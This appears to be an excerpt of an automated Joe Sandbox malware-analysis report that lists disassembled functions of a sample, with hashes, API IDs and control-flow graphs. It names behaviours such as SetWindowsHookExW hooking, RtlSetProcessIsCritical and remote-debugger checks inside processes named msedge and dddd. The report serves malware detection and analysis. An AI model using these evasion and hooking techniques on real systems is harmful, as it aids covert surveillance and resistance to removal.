                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                                                      • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                      • Instruction ID: 62b1d1f84e2720f0c2b144e6d6778a27936c91cc0b47464ab0b2b22f3f879139
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09115132609B8182EB609F15F400299B7E0FB88B84F584231DBAD077A9DF3CC561C740
                                                                                                                                                                                                      Function 00007FFBBCD451D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                                                      • Opcode ID: 24fc685d9c18a97879a9043e169dd32e9d23318a9617333a79ec660fdc06252e
                                                                                                                                                                                                      • Instruction ID: 984ac1c2dd8fae40bf88ddda4c98963282121bb84d2f84b7ba3417aa59493804
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24fc685d9c18a97879a9043e169dd32e9d23318a9617333a79ec660fdc06252e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7114CB6709B8182EB21CB29E44425AB7E4FB88B94F584235DF8C07758EF3CC5518704
                                                                                                                                                                                                      Function 00007FF7FF5A07AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                      • API String ID: 2595371189-336475711
                                                                                                                                                                                                      • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                      • Instruction ID: 51002d20dc399fcf7225d531e7aa008d07496236daae5ad4f3dea19c87a1a16d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C501716291928386F734BF6094652BEA3A0EF44708FC40235D57D83BD1DE3CE514CAA4
                                                                                                                                                                                                      Function 00007FFBBCD4E4D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FFBBCD4E720: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFBBCD4E74B
                                                                                                                                                                                                        • Part of subcall function 00007FFBBCD45508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBBCD4108E), ref: 00007FFBBCD45516
                                                                                                                                                                                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBBCD4E50A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __except_validate_context_recordabortterminate
                                                                                                                                                                                                      • String ID: csm$f
                                                                                                                                                                                                      • API String ID: 339134311-629598281
                                                                                                                                                                                                      • Opcode ID: 049055b88727f29c58bed955df15e2ffd86eccd5c54e7ffa759ec555c1e45828
                                                                                                                                                                                                      • Instruction ID: 6d388b233bd59ddcd64ce30b0926c914ada1dbc725eccaeb0d4ac9d53106364c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 049055b88727f29c58bed955df15e2ffd86eccd5c54e7ffa759ec555c1e45828
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51E0E5F9F0864291EB20FB74F28813CABA0AF05B50F148138DB4806A4BDE3CD9908309
                                                                                                                                                                                                      Function 00007FFBBB609D90 Relevance: 5.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy$memmove
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1283327689-0
                                                                                                                                                                                                      • Opcode ID: a822a3c8bf466068df5eb3aac5ce475471c643321ec8a211c878ee833f65bf0a
                                                                                                                                                                                                      • Instruction ID: 0914c9fec8ca8443ca60d2a327d0ef8ba0deae937b4270149a23ea579dfe616b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a822a3c8bf466068df5eb3aac5ce475471c643321ec8a211c878ee833f65bf0a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D131E1B2B086448BDA149E3EE844168F7A2FB14B90B589139DB5F477E4DE7CDC41C704
                                                                                                                                                                                                      Function 00007FFBBCD45524 Relevance: 5.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FFBBCD453A9,?,?,?,?,00007FFBBCD4F63F,?,?,?,?,?), ref: 00007FFBBCD45543
                                                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FFBBCD453A9,?,?,?,?,00007FFBBCD4F63F,?,?,?,?,?), ref: 00007FFBBCD455CC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                                                      • Opcode ID: 550cea5c84bc0485e2971ce80c0edd506865995108a692b5126701225aaf57c4
                                                                                                                                                                                                      • Instruction ID: 08e8f78524a5ca4f1d0beda0204243ba4aa1b537f842445dc8f85fac0f92aaa8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 550cea5c84bc0485e2971ce80c0edd506865995108a692b5126701225aaf57c4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F711F1F8B0974282FA55DB7DE85C23963A2AF447A1F544A34DB2D473D5EE3CE842C608

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:27.6%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                      Signature Coverage:33.3%
                                                                                                                                                                                                      Total number of Nodes:9
                                                                                                                                                                                                      Total number of Limit Nodes:0

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00007FFB49897A81 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000C.00000002.2757668919.00007FFB49890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49890000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_7ffb49890000_msedge.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3662101638-0
                                                                                                                                                                                                      • Opcode ID: 971cfec5625fbeb0b02d5476e0101b682bf71d55649977abf9be5737cc48d148
                                                                                                                                                                                                      • Instruction ID: 2a0bb152af3cefb52d11a105746113fd75a36d9e0dbbf35f21c2d1cf801f0309
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 971cfec5625fbeb0b02d5476e0101b682bf71d55649977abf9be5737cc48d148
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C51107190CB898FDB46EF78C8456A97FF0FF56311F0842ABD489C7192DB28A845CB91
                                                                                                                                                                                                      Function 00007FFB49898BF2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000C.00000002.2757668919.00007FFB49890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49890000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_7ffb49890000_msedge.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalProcess
                                                                                                                                                                                                      • String ID: O_^
                                                                                                                                                                                                      • API String ID: 2695349919-3627497092
                                                                                                                                                                                                      • Opcode ID: ffffcf1a3d63b31aa9b899954f54bf52d4401e7e6b1913b6ed28fbf7f31412f9
                                                                                                                                                                                                      • Instruction ID: eeb66dd2ba1241553f76db591bccfda0ed52526f30c1577cd0f7c15c36352829
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffffcf1a3d63b31aa9b899954f54bf52d4401e7e6b1913b6ed28fbf7f31412f9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A31007190CA498FDB29EF6CD845AE97BF0FF55311F14412EE09AD3682CB24A846CB91
                                                                                                                                                                                                      Function 00007FFB49899BAD Relevance: 1.8, APIs: 1, Instructions: 254COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 374 7ffb49899bad-7ffb49899c28 378 7ffb49899c2a-7ffb49899c2f 374->378 379 7ffb49899c32-7ffb49899c64 374->379 378->379 381 7ffb49899c66 379->381 382 7ffb49899c6c-7ffb49899c9f 379->382 381->382 384 7ffb49899caa-7ffb49899d1d 382->384 385 7ffb49899ca1-7ffb49899ca9 382->385 389 7ffb49899d23-7ffb49899d28 384->389 390 7ffb49899da9-7ffb49899dad 384->390 385->384 394 7ffb49899d2f-7ffb49899d30 389->394 391 7ffb49899d32-7ffb49899d6f SetWindowsHookExW 390->391 392 7ffb49899d77-7ffb49899da8 391->392 393 7ffb49899d71 391->393 393->392 394->391
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000C.00000002.2757668919.00007FFB49890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49890000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_7ffb49890000_msedge.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HookWindows
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2559412058-0
                                                                                                                                                                                                      • Opcode ID: 25339889b09142d1d0843cca359bad7f04ed94ccf09037d3d4ba009e590a8318
                                                                                                                                                                                                      • Instruction ID: 9cd9231d03d6522a929c792c2cfbe3d1856f50698f8e0b59b6bb6ece4d217a9a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25339889b09142d1d0843cca359bad7f04ed94ccf09037d3d4ba009e590a8318
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C771017090CA4D8FDB49EF6CD8466F9BBE1EF59321F00422ED049C3692CB65A8068B81
                                                                                                                                                                                                      Function 00007FFB498998A8 Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 420 7ffb498998a8-7ffb49899960 RtlSetProcessIsCritical 424 7ffb49899968-7ffb4989999d 420->424 425 7ffb49899962 420->425 425->424
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000C.00000002.2757668919.00007FFB49890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49890000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_7ffb49890000_msedge.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalProcess
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2695349919-0
                                                                                                                                                                                                      • Opcode ID: 03bfcb85d824aeede859a38616d033c888a261a0e5070483ddb3834dd3791dcb
                                                                                                                                                                                                      • Instruction ID: 555c06340940ef7e1a0f04b621e383e90d16b0d96d522f6513543fdc9e800a92
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03bfcb85d824aeede859a38616d033c888a261a0e5070483ddb3834dd3791dcb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4231CF7190CA188FDB28DFACD845AE97BF0FF55311F14012EE49AD3682CB70A846CB81

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00007FFB498D79D0 Relevance: 8.3, Strings: 6, Instructions: 806COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: HA{I$HA{I$HA{I$HA{I$HA{I$\
                                                                                                                                                                                                      • API String ID: 0-361601824
                                                                                                                                                                                                      • Opcode ID: 3dac6a43c64f0651738ae0d428a689a13dde00a575bfa98e8a0e684713910df7
                                                                                                                                                                                                      • Instruction ID: db1d4ba9412d6b3be0cbe0707f5ff2b17862a75a91cbcbcad1ab15026b7fba6e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3dac6a43c64f0651738ae0d428a689a13dde00a575bfa98e8a0e684713910df7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F24232B1A1CA4A4FE769EE3CC48167977D1EF89740F14427ED48FC7292CD28B84687A1
                                                                                                                                                                                                      Function 00007FFB498CFA56 Relevance: 6.8, Strings: 5, Instructions: 577COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: @W{I$@W{I$@W{I$@W{I$@W{I
                                                                                                                                                                                                      • API String ID: 0-1465678087
                                                                                                                                                                                                      • Opcode ID: a44ccb3a8ded7c5eeb74b64028d5d59c09daa02929ef4c24b6444f08b88f91a3
                                                                                                                                                                                                      • Instruction ID: d86aba8b24d82e51f5bb784f83e07c4d272a6476292133807651bee5ecbd15cc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a44ccb3a8ded7c5eeb74b64028d5d59c09daa02929ef4c24b6444f08b88f91a3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B02A0B1A1CB4A8FE758EF2CC445669B7E2FFA9340F10457EE489C7292DE34E8458742
                                                                                                                                                                                                      Function 00007FFB498C5968 Relevance: 6.8, Strings: 5, Instructions: 568COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: @W{I$@W{I$@W{I$@W{I$@W{I
                                                                                                                                                                                                      • API String ID: 0-1465678087
                                                                                                                                                                                                      • Opcode ID: 87672e0f6c9502d3e286bb10bfbfef04a177173d0db8dc74e154fdee82cfd3d3
                                                                                                                                                                                                      • Instruction ID: a17802007ed0f3de4a40def051787547666dbc564693c2779378cc4dd87f020a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87672e0f6c9502d3e286bb10bfbfef04a177173d0db8dc74e154fdee82cfd3d3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 030290B1A1CB4A8FE758EF2CC445669B7D2FFA9340F10457EE48AC7292DE34E8458742
                                                                                                                                                                                                      Function 00007FFB498C590F Relevance: 6.5, Strings: 5, Instructions: 284COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: @W{I$@W{I$@W{I$@W{I$@W{I
                                                                                                                                                                                                      • API String ID: 0-1465678087
                                                                                                                                                                                                      • Opcode ID: 08230e405fc524257b7f299715d6b3f2adbfd2965a95d41f01ec945526cce745
                                                                                                                                                                                                      • Instruction ID: f4807be016af7751f979efc7831f205d369feda9f62201abbb0fbc170c33315e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08230e405fc524257b7f299715d6b3f2adbfd2965a95d41f01ec945526cce745
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7391C4B295CA879FE759EE2CC445765B7E1FFA8380F0405B9D04AC75C2DE34E8868782
                                                                                                                                                                                                      Function 00007FFB498C48E0 Relevance: 4.1, Strings: 3, Instructions: 328COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: ?K_H$HA{I$HA{I
                                                                                                                                                                                                      • API String ID: 0-2354627073
                                                                                                                                                                                                      • Opcode ID: 7587dcfcc640ca41cdeae98f3a0a5608c0ad06dd8af928e81470b4b7bab58214
                                                                                                                                                                                                      • Instruction ID: 569d8fa7bfaebcddcfca36dee77d9b090029a46de9b58704ebf469c95ef66591
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7587dcfcc640ca41cdeae98f3a0a5608c0ad06dd8af928e81470b4b7bab58214
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53B1E3A0A0CA4B4FE769BE3CC5982B577A1EF46790F0542BED45EC71C3ED2868458361
                                                                                                                                                                                                      Function 00007FFB498CCA60 Relevance: 4.1, Strings: 3, Instructions: 320COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: HA{I$HA{I$HA{I
                                                                                                                                                                                                      • API String ID: 0-3810296549
                                                                                                                                                                                                      • Opcode ID: b0e8842e26a53a3200199e7f45213fe3c71e5c5d6df1a2b57fe3ff8a252bdd99
                                                                                                                                                                                                      • Instruction ID: 89e66d8164dd478f91ac4fabb112ea24ff56c7d497583576123e7f48a2e3b6ff
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0e8842e26a53a3200199e7f45213fe3c71e5c5d6df1a2b57fe3ff8a252bdd99
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 948129B1B1CD0A0FE6A4EE6CE8597B933D1EFA8361B0505BAE45DC72D2DD189C428381
                                                                                                                                                                                                      Function 00007FFB498C6C90 Relevance: 4.0, Strings: 3, Instructions: 247COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: #S_H$HA{I$HA{I
                                                                                                                                                                                                      • API String ID: 0-773528311
                                                                                                                                                                                                      • Opcode ID: 6e8090f76af4ac0815c98795e18cc04840d515cecd625c25dc3908ca37d88b5b
                                                                                                                                                                                                      • Instruction ID: 0eb664fe624bb2b0eca1b2f7acf7e2441742d41c81b7a23c13f3834799fd1805
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e8090f76af4ac0815c98795e18cc04840d515cecd625c25dc3908ca37d88b5b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE710D71A1894E8FDFC8EF6CC495AA937E1FFA9381F040079E45AD72A1CA34E8418780
                                                                                                                                                                                                      Function 00007FFB498CD35F Relevance: 2.9, Strings: 2, Instructions: 433COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: @W{I$kk
                                                                                                                                                                                                      • API String ID: 0-2850934808
                                                                                                                                                                                                      • Opcode ID: d5bf29a07f335546a32dd89e5fbba4820990abf1cac8774b5c07f52ad69896fb
                                                                                                                                                                                                      • Instruction ID: cab8d3ea41f3a5659bf418fff5716ab7f269317ade9f70731bcc513d3bfc2993
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5bf29a07f335546a32dd89e5fbba4820990abf1cac8774b5c07f52ad69896fb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26D19DB1B1CA4A4FEB99FF2CC485AB877D1EF68340B0441BAD85EC72D6DD24E8458781
                                                                                                                                                                                                      Function 00007FFB498C7C50 Relevance: 2.6, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: HA{I$_
                                                                                                                                                                                                      • API String ID: 0-4262683722
                                                                                                                                                                                                      • Opcode ID: d2b253cbf950be01e9e4c895a92ce0c0e8cfc5795f4754d1267019653fb7f30c
